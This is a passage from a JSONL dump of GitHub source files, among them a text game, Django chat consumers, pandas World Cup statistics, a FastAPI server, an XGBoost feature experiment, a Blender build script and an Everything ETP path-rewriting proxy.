f\"{'-'*60}\\nyou are a halfling, just trying to exist\\nmeanwhile, the dark lord rampages across the world\\n you do not care about this. you are trying to farm potatoes\\n because what could a halfling possibly do about it anyway\\n{'-'*60}\\n\"\n print(\n f\"\\n{game_name.center(line_length)}\\n{game_desc.center(line_length)}\\n{game_desc2.center(line_length)}\"\n )\n lines = plot.split(\"\\n\")\n for line in lines:\n print(line.center(line_length))\n\n\ndef play(player):\n potato_str = \"a potato\"\n if player.danger_level > 1:\n potato_str = f\"{player.danger_level} potatoes\"\n print(f\"\\n1. Advance to the next day.\\n2. Hurl {potato_str} at an orc.\\n3. Quit\")\n choice = input(\"> \")\n return choice\n\n\ndef game_loop(player, hud_style=\"basic_interface\"):\n while not events.end_state(player):\n print(hud.display(player, hud_style))\n player_input = play(player)\n if player_input == \"1\":\n events.grass_and_mud(player, events.roll())\n player.turn += 1\n elif player_input == \"2\":\n hurled = events.hurling_in_the_back_garden(player)\n if hurled:\n player.turn += 1\n elif player_input == \"3\":\n print(\"See ya!\")\n exit(0)\n print(hud.display(player, hud_style))\n\n\ndef play_again(player):\n choice = input(\"Play again? (y/n)\\n> \")\n if choice[0].lower() == \"y\":\n print(\"\\n\")\n player.reset()\n return\n if choice[0].lower() == \"n\":\n print(\"See ya!\")\n exit(0)\n print('Invalid input. Please enter \"y\" or \"n\".')\n play_again(player)\n\n\ndef main():\n player = Halfling()\n if start():\n hud_style = hud.choose_style()\n while True:\n game_loop(player, hud_style)\n play_again(player)\n else:\n print(\"See ya!\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codymillscodes/cs50p","sub_path":"PS9/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30572055726","text":"import asyncio\nimport random\n\nfrom .exceptions import RemoteMethodError\n\nclass MethodCall:\n '''An internal representation of a method call'''\n \n def __init__(self):\n self._id = str(random.randint(1, 1000000))\n self._returned = asyncio.Event()\n \n self._error, self._result = None, None\n \n async def __wait__(self):\n await self._returned.wait()\n \n if self._error:\n raise RemoteMethodError(self._error.get('message', self._error))\n else:\n return self._result\n\n async def __result__(self, error, result):\n self._error, self._result = error, result\n self._returned.set()\n","repo_name":"hunternet93/ddp_asyncio","sub_path":"ddp_asyncio/methodcall.py","file_name":"methodcall.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"35781776037","text":"# chat/consumers.py\nimport json\nfrom asgiref.sync import async_to_sync, sync_to_async\nimport json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom channels.db import database_sync_to_async\nfrom django.contrib.auth import get_user_model\nfrom chat.models import UserProfileModel\nfrom users.models import AppUser\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n current_user_id = self.scope['user'].id if self.scope['user'].id else int(self.scope['query_string'])\n other_user_id = self.scope['url_route']['kwargs']['id']\n self.room_name = (\n f'{current_user_id}-{other_user_id}'\n if int(current_user_id) > int(other_user_id)\n else f'{other_user_id}-{current_user_id}'\n )\n print(self.room_name)\n self.room_group_name = f'chat_{self.room_name}'\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n await self.accept()\n await self.send(text_data=self.room_group_name)\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.room_group_name, self.channel_layer)\n await self.disconnect(close_code)\n\n async def receive(self, text_data):\n text_data_json = json.loads(text_data)\n message = text_data_json[\"message\"]\n\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name, {\"type\": \"chat_message\", \"message\": message}\n )\n\n async def chat_message(self, event):\n message = event[\"message\"]\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\"message\": message}))\n\n\nclass NotificationConsumer(AsyncWebsocketConsumer):\n async def connect (self):\n my_id = self.scope ['user'].id\n self.room_group_name = f'{my_id}'\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n await self.accept()\n\n async def disconnect (self, code):\n self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n\n async def send_notification (self, event):\n data = json.loads(event.get('value'))\n count = data ['count']\n print(count)\n await self.send(text_data = json.dumps({\n 'count': count\n }))\n\n\nclass OnlineStatusConsumer(AsyncWebsocketConsumer):\n async def connect (self):\n self.room_group_name = 'user'\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n\n await self.accept()\n\n async def receive (self, text_data=None, bytes_data=None):\n data = json.loads(text_data)\n username = data ['username']\n connection_type = data ['type']\n print(connection_type)\n await self.change_online_status(username, connection_type)\n\n async def send_onlineStatus (self, event):\n data = json.loads(event.get('value'))\n username = data ['username']\n online_status = data ['status']\n await self.send(text_data = json.dumps({\n 'username' : username,\n 'online_status': online_status\n }))\n\n async def disconnect (self, message):\n self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n @database_sync_to_async\n def change_online_status (self, username, c_type):\n user = AppUser.objects.get(username = username)\n userprofile = UserProfileModel.objects.get(user = user)\n if c_type == 'open':\n userprofile.online_status = True\n userprofile.save()\n else:\n userprofile.online_status = False\n userprofile.save()","repo_name":"fathertime555/Capstone-Project","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8406520196","text":"import pandas as pd\n\ndata : pd.DataFrame = pd.read_csv(\"./WorldCupMatches.csv\")\ndata_2 : pd.DataFrame = pd.read_csv(\"./WorldCups.csv\")\ndata.drop(range(850,4568), inplace=True)\nprint(data.shape)\n\ndef getHeadToHeadMatches(country1, country2):\n headtohead = data[((data[\"Home Team Name\"] == country1) & (data[\"Away Team Name\"] == country2)) | ((data[\"Home Team Name\"] == country2) & (data[\"Away Team Name\"] == country1))]\n #print(headtohead)\n win_dict = dict()\n win_dict[country1] = 0\n win_dict[country2] = 0\n win_dict[\"draw\"] = 0\n for index,match in headtohead.iterrows():\n if(match[\"Home Team Name\"] == country1 and match[\"Away Team Name\"] == country2):\n goal_diff = int(match[\"Home Team Goals\"]) - int(match[\"Away Team Goals\"])\n if goal_diff > 0:\n win_dict[country1]+=1\n elif goal_diff == 0:\n win_dict[\"draw\"]+=1\n else:\n win_dict[country2]+=1\n elif (match[\"Home Team Name\"] == country2 and match[\"Away Team Name\"] == country1):\n goal_diff = int(match[\"Home Team Goals\"]) - int(match[\"Away Team Goals\"])\n if goal_diff > 0:\n win_dict[country2]+=1\n elif goal_diff == 0:\n win_dict[\"draw\"]+=1\n else:\n win_dict[country1]+=1\n return {\"data\" : list(win_dict.values()), \"labels\" : list(win_dict.keys())}\n \ndef getAverageGoals():\n average_goals = {}\n years = pd.unique(data[\"Year\"])\n years = years[~pd.isnull(years)]\n for year in years:\n matches = data[data[\"Year\"] == year]\n total_goals = 0\n for index,match in matches.iterrows():\n total_goals += match[\"Home Team Goals\"] + match[\"Away Team Goals\"]\n total_matches = matches.shape[0]\n average_goals[int(year)] = round((total_goals/total_matches),2)\n return [{\"Year\" : k, \"goals\" : v} for k,v in average_goals.items()]\n\ndef number_of_worldcups():\n worldcups = {}\n finals = data[data[\"Stage\"]==\"Final\"]\n for index,match in finals.iterrows():\n if match[\"Home Team Goals\"] > match[\"Away Team Goals\"]:\n if match[\"Home Team Name\"] in worldcups.keys():\n worldcups[match[\"Home Team Name\"]] +=1\n else:\n worldcups[match[\"Home Team Name\"]] =1\n elif match[\"Home Team Goals\"] < match[\"Away Team Goals\"]:\n if match[\"Away Team Name\"] in worldcups.keys():\n worldcups[match[\"Away Team Name\"]] +=1\n else:\n worldcups[match[\"Away Team Name\"]] =1\n else:\n winner = match[\"Win conditions\"].split(\" \")[0]\n if winner in worldcups.keys():\n worldcups[winner] +=1\n else:\n worldcups[winner] = 1\n winners = []\n winners = [{\"country\" : k, \"cups\" : v} for k,v in worldcups.items()]\n print(winners)\n return winners\ndef goalsScorePerWorldCup():\n result = data_2[[\"Year\",\"GoalsScored\"]]\n print(result)\n result_dict = [{\"Year\" : int(val[\"Year\"]), \"goals\" : int(val[\"GoalsScored\"])} for indx, val in result.iterrows()]\n return result_dict\n\ndef attendanceInWorldCups():\n result = data_2[[\"Year\",\"Attendance\"]]\n print(result)\n result_dict = [{\"Year\" : int(val[\"Year\"]), \"people\" : int(val[\"Attendance\"])} for indx, val in result.iterrows()]\n return result_dict\n\ndef popularMatchesByTeam(country):\n matches = data[(data[\"Away Team Name\"] == country) | (data[\"Home Team Name\"] == country)]\n match_data = matches.groupby(\"Year\").sum(\"Attendance\")\n attendance = match_data[[\"Attendance\"]].to_dict()\n result_dict = [ {\"Year\" : int(k), \"people\" : int(v)}for k,v in attendance[\"Attendance\"].items()]\n return result_dict\n\n#opularMatchesByTeam(\"Germany\")\n#attendanceInWorldCups()","repo_name":"captainCommit/cms-stats","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11091678292","text":"import uvicorn\nfrom fastapi import FastAPI, APIRouter, Request\n\nfrom app.db import init_databases, shutdown_databases\nfrom app.models import GetModelNamesResponse, GetLevelRequest, GetLevelResponse\nfrom app.routes.get_level import _get_level\nfrom app.routes.get_model_names import _get_model_names\nfrom app.settings import load_config, CONFIG\nfrom app.settings.consts import VERSION, SERVICE_NAME, MSG_SERVICE_DESCRIPTION\nfrom app.settings.logging import init_logging\n\nrouter = APIRouter()\n\n\n@router.on_event(\"startup\")\nasync def startup():\n await init_databases(CONFIG)\n\n\n@router.on_event(\"shutdown\")\nasync def shutdown():\n await shutdown_databases()\n\n\n@router.get(\"/self_check\")\nasync def self_check(r: Request):\n return {\"status\": \"Ok\"}\n\n\n@router.get(\"/get_model_names/\")\nasync def get_model_names() -> GetModelNamesResponse:\n \"\"\"\n идем в монгу и просим коллекции вида: \"MODEL_{days_back}_{days_forward}\"\n Отдаем json вида:\n {\n 'data': [\n { 'name': 'string', 'id': 'mongo_collection_name' }\n ]\n }\n \"\"\"\n response = await _get_model_names()\n return response\n\n\n@router.post(\"/get_level/\")\nasync def get_level(r: GetLevelRequest) -> GetLevelResponse:\n \"\"\"\n идем в монгу и просим уровень коллекции вида: \"MODEL_{days_back}_{days_forward}\"\n \"\"\"\n response = await _get_level(level_id=r.level_id, model_id=r.model_id)\n if response is None:\n return { 'status': \"No level\" }\n return response\n\n\ndef init_app():\n load_config()\n init_logging()\n\n app = FastAPI(\n title=SERVICE_NAME, description=MSG_SERVICE_DESCRIPTION, version=VERSION,\n )\n\n app.include_router(router, prefix=f\"/{SERVICE_NAME}\")\n\n return app\n\n\ndef run():\n app = init_app()\n uvicorn.run(app, host=\"0.0.0.0\", port=8080)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"comptech-winter-school/stock-news","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"44594557576","text":"# 7. Reverse Integer\r\n\r\n# Example 1:\r\n# Input: x = 123\r\n# Output: 321\r\n\r\n# Example 2:\r\n# Input: x = -123\r\n# Output: -321\r\n\r\n# Example 3:\r\n# Input: x = 120\r\n# Output: 21\r\n\r\ndef reverse(self, x: int) -> int:\r\n if x > 0:\r\n answer = int(str(x)[::-1])\r\n if answer >= -(2**31) and answer <= (2**31 - 1):\r\n return answer \r\n else: \r\n return 0\r\n else:\r\n answer = int(str(-x)[::-1]) * -1\r\n if answer >= -(2**31) and answer <= (2**31 - 1):\r\n return answer \r\n else: \r\n return 0","repo_name":"MothScientist/leetcode_solutions","sub_path":"7. Reverse Integer.py","file_name":"7. Reverse Integer.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"45964663346","text":"from mlapp.main import MLApp\nfrom mlapp.config import settings\nimport pandas as pd\n\nif __name__ == \"__main__\":\n config = {\n 'handler_name': 'handler',\n 'files': [{\n 'table_name': 'table',\n 'file_name': 'file_name.csv'\n }]\n }\n\n mlapp = MLApp({'env_file_path': 'path/to/.env'})\n handlers = {}\n for service_name in settings.get('services', []):\n service_item = settings['services'][service_name]\n try:\n handlers[service_name] = service_item['handler'](service_item.get('settings', {}))\n except Exception as e:\n if service_item['handler'] is None:\n raise Exception(\"{} service is missing a python library installation.\".format(service_name))\n else:\n raise e\n\n for item in config['files']:\n df = pd.read_csv(item['file_name'])\n handlers[config['handler_name']].insert_df(item['table_name'], df)\n\n","repo_name":"IBM/mlapp","sub_path":"scripts/export_local_data.py","file_name":"export_local_data.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"35393848364","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport sys\nimport os\nimport random\nimport pickle\nimport joblib\n\nfrom itertools import combinations\nfrom statsmodels import robust\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom xgboost import XGBClassifier\nfrom xgboost import plot_tree\nimport shap\n\nfrom itertools import cycle\nfrom scipy import interp\n\n# Parameters\nLABEL_COLUMN_NAME = 'bug'\nUNWANTED_COLUMNS = []\n\nWANTED_COLUMNS = [\n 'dit', 'noc', 'cbo', 'rfc', 'lcom', 'ca', 'ce', 'npm', 'lcom3', 'loc', 'dam', 'moa', 'mfa', 'cam', 'ic', 'cbm', 'amc', 'max_cc', 'avg_cc'\n ]\n\nN_FOLDS = 5\nRANDOM_STATE = 1\n\nn_estimators = 20\nsubsample = 0.60\nlr = 0.1\nmax_depth = 10\n\ntotal = 0\nbest_models = 0\nbest_generated_model = 0\nfeat = []\n\nmodels = []\n\nfor c in range(1,50):\n feat.append('feature')\n\ndef random_combinations(iterable, r, x):\n pool = tuple(iterable)\n n = len(pool)\n a = []\n for i in range(x):\n indices = sorted(random.sample(range(n), r))\n a.insert(len(a),tuple(pool[i] for i in indices))\n return list(set(a))\n\ndef eval_features(df, features):\n #global total\n #global best_models\n global models\n # control de id of the classifier\n id = 0\n\n #total = total + 1\n\n X = df[features].values\n y = df[LABEL_COLUMN_NAME].values\n a = []\n b = []\n cv = StratifiedKFold(n_splits=N_FOLDS, shuffle=True, random_state=RANDOM_STATE)\n for (train, val) in cv.split(X, y):\n classifier = XGBClassifier(n_estimators=n_estimators, subsample=subsample, learning_rate=lr, max_depth=max_depth, n_jobs=16, random_state=1)\n\n classifier = classifier.fit(X[train], y[train])\n\n #location = \"models/bugpred%s.joblib.dat\" % (id)\n if (id == 3):\n models.append(classifier)\n id = id + 1\n #dump(classifier, location)\n #pickle.dump(classifier, open('models_xgb.sav', 'wb'))\n\n probas_ = classifier.predict_proba(X[val])\n area = roc_auc_score(y[val], probas_[:, 1])\n a.insert(len(a), area)\n\n for i in probas_[:, 1]:\n b.append(i)\n\n return a,b\n\ndef eval_panel(df, comb):\n for ff in comb:\n f = []\n for x in ff:\n f.insert(len(f),x)\n A,B = eval_features(df, f)\n #print(\"%s,%f,%s,%s\" % (f, np.mean(A),A,B))\n #check_best_models(A,f)\n print(\"%s,%f\" % (f, np.mean(A)))\n #file_features.write(str(f) + \"\\n\")\n #file_auc.write(str(np.mean(A)) + \"\\n\")\n sys.stdout.flush()\n\ndef check_best_models(acc,features):\n global best_models, best_generated_model, feat\n\n model_accuracy = np.mean(acc)*100\n\n # check the number of models above the baseline model\n if (model_accuracy > 78.5):\n best_models = best_models + 1\n if (len(features) < len(feat)):\n feat = features\n # check the highestes model achieved\n if (model_accuracy > best_generated_model):\n best_generated_model = model_accuracy\n \n\n# Reads dataset\ndf_mblood = pd.read_csv(sys.argv[1])\n\n# Maps label\ndf_mblood.dropna(axis=0, subset=['bug'], inplace=True)\n\n#all_features = list(df_mblood.columns)\n#for f in UNWANTED_COLUMNS + [LABEL_COLUMN_NAME]:\n# all_features.remove(f)\n\nRANDOM_STATE = 1\nf = []\ni = 0\n#for f1 in all_features:\nfor f1 in WANTED_COLUMNS:\n if i == 20: break\n if f1 in f: continue\n k = 0\n x = f1\n i = i + 1\n j = 0\n avg = 0\n# for f2 in all_features:\n for f2 in WANTED_COLUMNS:\n if f2 in f: continue\n j = j + 1\n f.insert(len(f), f2)\n A,B = eval_features(df_mblood, f)\n #print(\"%s,%f,%s,%s\" % (f,np.mean(A),A,B))\n #check_best_models(A,f)\n print(\"%s,%f\" % (f,np.mean(A)))\n #file_features.write(str(f) + \"\\n\")\n #file_auc.write(str(np.mean(A)) + \"\\n\")\n f.remove(f2)\n sys.stdout.flush()\n avg = avg + np.mean(A)\n if np.mean(A) > k:\n x = f2\n k = np.mean(A)\n avg /= j\n f.insert(len(f), x)\n\nfor c in range(1,5):\n s = 50000\n comb = random_combinations(WANTED_COLUMNS, c, s)\n eval_panel(df_mblood, comb)\n\n#percentage = (best_models / total) * 100\n\n#with open('../reports/pde.txt', 'w') as f:\n# print(\"Total number of models: %i\\nBest achieved model: %f\\nFeatures related to the smallest set of features: %s\\nNumber of best models: %i \\nPercentage of best models: %f\" % (total,best_generated_model,feat,best_models,percentage), file=f)\n\njoblib.dump(models, 'models.pkl')\n\nprint('program complete!!!')","repo_name":"gesteves91/ck-metrics","sub_path":"src/exploration_models.py","file_name":"exploration_models.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10199292306","text":"import datetime\n\nfrom entity.episode import Episode\nfrom repository import podcast_repository\nfrom repository import episode_repository\n\n\ndef create_episode(title: str, episode_id: int, index_name: str):\n podcast = podcast_repository.find_by_index_name(index_name)\n episode = Episode(\n backnumber=episode_id,\n title=title,\n description=\"\",\n spotifyUrl=\"\",\n applePodcastUrl=\"\",\n postedAt=datetime.datetime.now(),\n podcastId=podcast.id,\n )\n\n episode_repository.create(episode)\n","repo_name":"yuta519/koesagas","sub_path":"transcriber/usecase/episode/create_usecase.py","file_name":"create_usecase.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32708841178","text":"from sqlalchemy.orm import Session\nfrom typing import Optional\n\nfrom db import crud\nfrom api_models.threat import ThreatCreate\nfrom api_models.threat_type import ThreatTypeCreate\nfrom api_models.queue import QueueCreate\n\n\ndef create_or_read(\n value: str, db: Session, description: Optional[str] = None, queues: list[str] = None, types: list[str] = None\n):\n if queues is None:\n queues = [\"external\"]\n\n for queue in queues:\n crud.queue.create_or_read(model=QueueCreate(value=queue), db=db)\n\n if types is None:\n types = [\"test_type\"]\n\n for type in types:\n crud.threat_type.create_or_read(model=ThreatTypeCreate(queues=queues, value=type), db=db)\n\n return crud.threat.create_or_read(\n model=ThreatCreate(description=description, queues=queues, types=types, value=value), db=db\n )\n","repo_name":"seanmcfeely/ace2-ams","sub_path":"db/app/db/tests/factory/threat.py","file_name":"threat.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24290865471","text":"#Simple code to display how an if statement can be used to increment a value\n\n\nclick = False\n\nlike = 0\n\nclick = True\n\nif click == True:\n like += 1\n click = False\n\nprint(like)","repo_name":"geniusdev26/loops_if_statement","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260913442","text":"\nans = 0\nfor _ in range(int(input())):\n word = input()\n temp = []\n l = len(word)\n i = 0\n while i < l:\n now = word[i]\n if now in temp :\n break\n i += 1\n while i < l and now == word[i]:\n i += 1\n else:\n temp += [now]\n else:\n ans += 1\n\nprint(ans)","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210804/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2227679151","text":"val = int(input(\"How many numbers in the list: \"))\nlist_val = []\n\nfor i in range(val):\n data = int(input(\"Enter {} number: \".format(i+1)))\n list_val.append(data)\n\nsummation = 0\nfor num in list_val:\n summation = summation + num\n\nprint(summation)\n\n# alternatively:\n# s = sum(list_val)\n# print(s)","repo_name":"goku-g/AI-lab_reports","sub_path":"lab-1-intro_python/9-sum_all_list_item.py","file_name":"9-sum_all_list_item.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72248759525","text":"#!/usr/bin/python\nimport sys\nimport os\n\ndef normpath(path):\n return os.path.abspath(os.path.normpath(path))\n\nImport ('env')\ncflags = [] #['-Wall']\ndefines = []\nroot_build_dir=normpath(env['BF_BUILDDIR'])\n\nsource_files = env.Glob('*.c')\nsource_files.remove('rna_access.c')\n\ngenerated_files = source_files[:]\ngenerated_files.remove('rna_define.c')\ngenerated_files.remove('makesrna.c')\n\napi_files = env.Glob('*_api.c')\nfor api_file in api_files:\n generated_files.remove(api_file)\n\ngenerated_files = [filename[:-2] + '_gen.c' for filename in generated_files]\n\nmakesrna_tool = env.Clone()\nrna = env.Clone()\nmakesrna_tool.Append(CCFLAGS = '-DBASE_HEADER=\"\\\\\"source/blender/makesrna/\\\\\"\" ')\n\ndefs = []\n\nincs = '#/intern/guardedalloc ../../blenlib ../../blenkernel ../../blenloader'\nincs += ' ../../imbuf ../../makesdna ../../makesrna ../../ikplugin'\nincs += ' ../../windowmanager ../../editors/include ../../blenfont'\nincs += ' ../../render/extern/include'\nincs += ' #/intern/audaspace/intern '\nincs += ' #/extern/glew/include '\n\nif env['WITH_BF_OPENEXR']:\n defs.append('WITH_OPENEXR')\n\nif env['WITH_BF_TIFF']:\n defs.append('WITH_TIFF')\n\nif env['WITH_BF_OPENJPEG']:\n defs.append('WITH_OPENJPEG')\n\nif env['WITH_BF_DDS']:\n defs.append('WITH_DDS')\n\nif env['WITH_BF_CINEON']:\n defs.append('WITH_CINEON')\n\nif env['WITH_BF_HDR']:\n defs.append('WITH_HDR')\n\ndefs.append('WITH_FRAMESERVER') # TODO, make optional\n\nif env['WITH_BF_FFMPEG']:\n defs.append('WITH_FFMPEG')\n incs += ' ' + env['BF_FFMPEG_INC']\n\nif env['WITH_BF_OGG']:\n defs.append('WITH_OGG')\n\nif env['WITH_BF_QUICKTIME']:\n defs.append('WITH_QUICKTIME')\n incs += ' ../../quicktime'\n\nif env['WITH_BF_GAMEENGINE']:\n defs.append('WITH_GAMEENGINE')\n \nif env['WITH_BF_FFTW3']:\n defs.append('WITH_FFTW3')\n\nif env['WITH_BF_SDL']:\n defs.append('WITH_SDL')\n\nif env['WITH_BF_OPENAL']:\n defs.append('WITH_OPENAL')\n\nif env['WITH_BF_JACK']:\n defs.append('WITH_JACK')\n\nif env['BF_UNIT_TEST']:\n defs.append('UNIT_TEST')\n\nif env['WITH_BF_PYTHON']:\n defs.append('WITH_PYTHON')\n\nif env['WITH_BF_COLLADA']:\n defs.append('WITH_COLLADA')\n\nif env['OURPLATFORM'] == 'linux':\n cflags='-pthread'\n incs += ' ../../../extern/binreloc/include'\n\nif env['OURPLATFORM'] in ('win32-vc', 'win32-mingw', 'linuxcross', 'win64-vc'):\n incs += ' ' + env['BF_PTHREADS_INC']\n\nif env['WITH_BF_INTERNATIONAL']:\n defs.append('WITH_INTERNATIONAL')\n\nmakesrna_tool.Append(CPPDEFINES=defs)\n\nmakesrna_tool.Append (CPPPATH = Split(incs))\n\nif env['OURPLATFORM'] == 'linuxcross':\n USE_WINE = True # when cross compiling on linux 64bit this is useful\nelse:\n USE_WINE = False\n\nif not USE_WINE:\n if env['OURPLATFORM'] == 'linuxcross':\n makesdna_tool.Replace(CC='gcc')\n makesdna_tool.Replace(AR='ar')\n makesdna_tool.Replace(LINK='gcc')\n\nif sys.platform != 'cygwin':\n makesrna_tool.Append (CCFLAGS = cflags)\nmakesrna_tool.Append (CPPDEFINES = defines)\n\nlibdir = root_build_dir+'/lib'\nif not (root_build_dir[0]==os.sep or root_build_dir[1]==':'):\n libdir = '#' + libdir\n\nmakesrna_tool.Append (LIBPATH = libdir)\n\nmakesrna_tool.Append( CFLAGS = env['CFLAGS'])\nmakesrna_tool.Append( CCFLAGS = env['CCFLAGS'])\nmakesrna_tool.Append( LINKFLAGS = env['PLATFORM_LINKFLAGS'])\n\nif env['BF_PROFILE']:\n makesrna_tool.Append (LINKFLAGS = env['BF_PROFILE_FLAGS'])\n\nif env['BF_DEBUG']:\n makesrna_tool.Append(CFLAGS = env['BF_DEBUG_CFLAGS'])\n makesrna_tool.Append(CCFLAGS = env['BF_DEBUG_CCFLAGS'])\n if env['OURPLATFORM'] in ('win32-vc','win64-vc'):\n makesrna_tool.Append(LINKFLAGS = ['/DEBUG','/PDB:makesrna.pdb'])\n\ntargetpath = root_build_dir+'/makesrna'\nif not (root_build_dir[0]==os.sep or root_build_dir[1]==':'):\n targetpath = '#' + targetpath\n\nif env['OURPLATFORM'] == 'linux' and root_build_dir[0]==os.sep:\n makesrna = makesrna_tool.Program (target = targetpath, source = source_files, LIBS=['bf_intern_guardedalloc', 'bf_dna', 'bf_blenlib'])\nelse:\n makesrna = makesrna_tool.Program (target = targetpath, source = source_files, LIBS=['bf_intern_guardedalloc', 'bf_dna', 'bf_blenlib'])\n\nrna_dict = rna.Dictionary()\nrna.Depends (generated_files, makesrna)\n\n# this seems bad, how to retrieve it from scons?\nbuild_dir = root_build_dir + os.sep +'source' + os.sep + 'blender' + os.sep + 'makesrna' + os.sep + 'intern' + os.sep\n \nif env['OURPLATFORM'] != 'linuxcross':\n if env['OURPLATFORM'] in ('win32-vc', 'win64-vc', 'win32-mingw'):\n rna.Command (generated_files, '', \"\\\"\" + root_build_dir+os.sep+\"makesrna.exe\\\" \\\"\" + build_dir )\n else:\n rna.Command (generated_files, '', \"\\\"\" + root_build_dir+os.sep+\"makesrna\\\" \\\"\" + build_dir + '\"' )\nelse:\n rna.Command (generated_files, '', root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n \n if USE_WINE:\n rna.Command (generated_files, '', 'wine ' + root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n else:\n rna.Command (generated_files, '', root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n\n\nobj = ['intern/rna_access.c']\nfor generated_file in generated_files:\n obj += ['intern/' + generated_file]\n\nReturn ('obj')\n\n","repo_name":"damiles/blendocv","sub_path":"source/blender/makesrna/intern/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"52"} +{"seq_id":"13112855522","text":"from __future__ import print_function\nimport sys\nfrom threading import Thread, Event\nfrom socket import socket, timeout as SOCKET_TIMEOUT\nfrom select import select\nfrom Queue import Queue\nfrom config import TIMEOUT_CLIENT_CONNECTION, TIMEOUT_REQ_CONNECTION, \\\n EVERYTHING_SERVER_IP, ETP_PORT\nfrom utils import recvall, vprint\n\nSERVER2CLIENT_KEYNAME = \"server2client\"\nCLIENT2SERVER_KEYNAME = \"client2server\"\nSRC_KEY = 'SRC_STRING'\nREPL_KEY = 'REPL_STRING'\nreplace_data = {\n SERVER2CLIENT_KEYNAME: [\n (\"PATH C:\\\\Users\\\\\", \"PATH \\\\\\\\\"),\n ],\n CLIENT2SERVER_KEYNAME: [{SRC_KEY: \"\",\n REPL_KEY: \"\"}, ],\n}\n\n\ndef get_manip_data(dst_conn_keyname, data):\n assert dst_conn_keyname in replace_data, \\\n \"Invalid dst_conn_keyname. must be: \" + str(replace_data.keys())\n new_data = data\n for src_str, repl_str in replace_data[dst_conn_keyname]:\n new_data = new_data.replace(src_str, repl_str)\n return new_data\n\n\nclass HandleConnectionThread(Thread):\n def __init__(self, client_conn, client_addr, *args, **kargs):\n super(HandleConnectionThread, self).__init__(*args, **kargs)\n self._stop_event = Event()\n self.client_conn = client_conn\n self.client_addr = client_addr\n self.server_conn = socket()\n self.conns = [self.server_conn, self.client_conn]\n\n def stop(self):\n self.close_connection()\n self._stop_event.set()\n\n def stopped(self):\n return self._stop_event.is_set()\n\n def close_connection(self):\n print(\"[-] Closing Connection: \" + str(self.client_addr),\n file=sys.stderr)\n for conn in self.conns:\n conn.close()\n self.conns.remove(self.server_conn)\n self.conns.remove(self.client_conn)\n\n def get_manipulated_data(self, dst_sck, data):\n dst_conn_keyname = CLIENT2SERVER_KEYNAME \\\n if dst_sck is self.server_conn \\\n else SERVER2CLIENT_KEYNAME\n return get_manip_data(dst_conn_keyname, data)\n\n def run(self):\n self.server_conn.settimeout(TIMEOUT_REQ_CONNECTION)\n try:\n self.server_conn.connect((EVERYTHING_SERVER_IP, ETP_PORT))\n except SOCKET_TIMEOUT:\n print(\"[!] [SOCKET_TIMEOUT] No Connection with ETP-Server at \" +\n str((EVERYTHING_SERVER_IP, ETP_PORT)),\n file=sys.stderr)\n self.close_connection()\n return\n except Exception as e:\n print(\"[!] No Connection with ETP-Server at %s. Error: %s\" %\n (str((EVERYTHING_SERVER_IP, ETP_PORT)), str(e)),\n file=sys.stderr)\n self.close_connection()\n return\n\n message_queues = {\n self.server_conn: Queue(),\n self.client_conn: Queue()\n }\n while self.conns:\n readable, writable, exceptional = select(\n self.conns, self.conns, [], TIMEOUT_CLIENT_CONNECTION)\n if not 